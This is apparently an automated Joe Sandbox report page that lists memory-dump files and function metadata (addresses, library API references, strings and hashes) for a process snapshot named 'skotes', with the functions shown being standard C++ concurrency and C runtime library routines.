Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: FreeProcessorVirtual$Concurrency::details::ListRootRoot::std::invalid_argument::invalid_argument
String ID: pExecutionResource
API String ID: 1772865662-359481074
Opcode ID: 99dc0ed684d8c8ec6e6612c7bc523f11e8890b7de7f676e8e4789c23388866ae
Instruction ID: 2e9ccc4d86ee0f0618e87ede3564ffa92dde821e80032c3f6b82a27148884c88
Opcode Fuzzy Hash: 99dc0ed684d8c8ec6e6612c7bc523f11e8890b7de7f676e8e4789c23388866ae
Instruction Fuzzy Hash: 2A21DB756403099BCB08EFA4C842BFDB7F5BF48300F108069F605AB292DBB4AE05DB95

Function 00C04EA2 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 74COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 00C04F24
Concurrency::details::CacheLocalScheduleGroupSegment::CacheLocalScheduleGroupSegment.LIBCONCRT ref: 00C04F66

Strings

ppVirtualProcessorRoots, xrefs: 00C04F1C
count, xrefs: 00C04EBA

Memory Dump Source

Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: CacheGroupLocalSchedule$Concurrency::details::SegmentSegment::std::invalid_argument::invalid_argument
String ID: count$ppVirtualProcessorRoots
API String ID: 2663199487-3650809737
Opcode ID: 2f3a9ab74d3814bac7235c994ee007eb37ad76d8f8e845bac0c6161dd42819fc
Instruction ID: 22627bca1bc5ba7ac454b93191648e9f2982aa7e9c950e600d6a623bae25d2a5
Opcode Fuzzy Hash: 2f3a9ab74d3814bac7235c994ee007eb37ad76d8f8e845bac0c6161dd42819fc
Instruction Fuzzy Hash: 0421F235600219EFCB08EFA8C891EAEB7B5BF48310F104069FA16976D1DB71AE02DF51

Function 00C0B975 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 64COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00C0BA0E

Strings

combase.dll, xrefs: 00C0B983, 00C0B988, 00C0B99D, 00C0B9C8
RoInitialize, xrefs: 00C0B998
RoUninitialize, xrefs: 00C0B9C1

Memory Dump Source

Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error
String ID: RoInitialize$RoUninitialize$combase.dll
API String ID: 348560076-3997890769
Opcode ID: 02a524bb344e90cc6d5c91a382eb0a35adf29c708667021494ada2d510d2b0da
Instruction ID: 4b2a873e6f07ccc2d85e1f07efbce09a5405ffc491e879ef9131f7784e838472
Opcode Fuzzy Hash: 02a524bb344e90cc6d5c91a382eb0a35adf29c708667021494ada2d510d2b0da
Instruction Fuzzy Hash: 8201F5B0AB13195FDB10F7765C0DBAF319CAF02708F212429A550E21C2EF35C800DBA9

Function 00C06E1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

SafeRWList.LIBCONCRT ref: 00C06E73

Part of subcall function 00C04E6E: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00C04E7F
Part of subcall function 00C04E6E: List.LIBCMT ref: 00C04E89

std::invalid_argument::invalid_argument.LIBCONCRT ref: 00C06E85
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00C06EAA

Strings

eventObject, xrefs: 00C06E7D

Memory Dump Source

Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: List$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorLock::_ReaderSafeWriteWriterstd::invalid_argument::invalid_argument
String ID: eventObject
API String ID: 1288476792-1680012138
Opcode ID: 949a6de95c6c84ac401731386dc75733d6bc31e0fd5c1596938b20329cb8ad0c
Instruction ID: 71577565a05131f0a011403d3ea713baa9111fb200d77000593ee841ebfcf28a
Opcode Fuzzy Hash: 949a6de95c6c84ac401731386dc75733d6bc31e0fd5c1596938b20329cb8ad0c
Instruction Fuzzy Hash: D411E575950308E7DB24EBA4CC4AFEF76A85F00704F204569B529A61C1DBB49A04CB75

Function 00C0A0EE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35threadCOMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 00C0A102
Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 00C0A126
std::invalid_argument::invalid_argument.LIBCONCRT ref: 00C0A139

Strings

pScheduler, xrefs: 00C0A131

Memory Dump Source

Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: Resource$Concurrency::details::Execution$CurrentManager::Proxy::RemoveSchedulerThreadstd::invalid_argument::invalid_argument
String ID: pScheduler
API String ID: 246774199-923244539
Opcode ID: 9ad5de34d3fce3c87ac9200bd7e3dceb01657faaa7e4921b4224b0a8b0e63ca5
Instruction ID: d803b4086d32ea5cdbb2c6c3e9c111ec9c7aece4f5bd60a76f147e0663ffbf5f
Opcode Fuzzy Hash: 9ad5de34d3fce3c87ac9200bd7e3dceb01657faaa7e4921b4224b0a8b0e63ca5
Instruction Fuzzy Hash: 0DF02736A44708E7C720FA55DC83C9EB7789E80B14F208279E916671C1DF70AF46C796

Function 00C1CBDF Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00C1CC66

Memory Dump Source

Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
